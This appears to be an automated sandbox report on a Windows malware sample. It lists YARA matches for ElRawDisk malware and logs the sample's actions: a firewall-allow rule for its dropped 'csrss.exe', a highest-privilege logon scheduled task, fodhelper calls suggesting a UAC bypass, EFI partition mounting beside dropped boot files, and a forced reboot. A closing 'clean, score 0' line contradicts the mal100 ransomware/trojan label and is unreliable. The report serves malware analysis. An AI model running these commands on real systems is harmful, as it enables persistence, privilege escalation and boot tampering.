Source: 10.3.4t4y4r89UZ.exe.5e29a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e240e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.5574f30.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.557a8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e9bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5caa8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e940e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.6559a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.55ea8d0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.5ca4f30.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.6559a80.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9ad2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.5caa8d0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.65540e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.9ab080.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9ab080.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

File created: C:\Windows\rss

Jump to behavior

Source: C:\Windows\rss\csrss.exe

Code function: String function: 0042C330 appears 36 times

Source: EfiGuardDxe.efi.14.dr	Static PE information: No import functions for PE file found
Source: bootmgfw.efi.14.dr	Static PE information: No import functions for PE file found
Source: bootx64.efi.14.dr	Static PE information: No import functions for PE file found

Source: 4t4y4r89UZ.exe	Binary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe	Binary or memory string: OriginalFilename vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameHamakaze.exe( vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesymsrv.dllj% vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWinmonFS.sysZ vs 4t4y4r89UZ.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamedsefix.exe. vs 4t4y4r89UZ.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: 4t4y4r89UZ.exe

Static PE information: invalid certificate

Source: 4t4y4r89UZ.exe

Virustotal: Detection: 33%

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

File read: C:\Users\user\Desktop\4t4y4r89UZ.exe

Jump to behavior

Source: 4t4y4r89UZ.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\4t4y4r89UZ.exe "C:\Users\user\Desktop\4t4y4r89UZ.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Users\user\Desktop\4t4y4r89UZ.exe C:\Users\user\Desktop\4t4y4r89UZ.exe
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: unknown	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: unknown	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\SysWOW64\mountvol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\SysWOW64\shutdown.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\rss\csrss.exe	Process created: unknown unknown
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'roughsnow.exe'

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: C:\Windows\rss\csrss.exe

File created: C:\Users\user\AppData\Local\Temp\csrss

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@62/18@12/5

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 4t4y4r89UZ

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

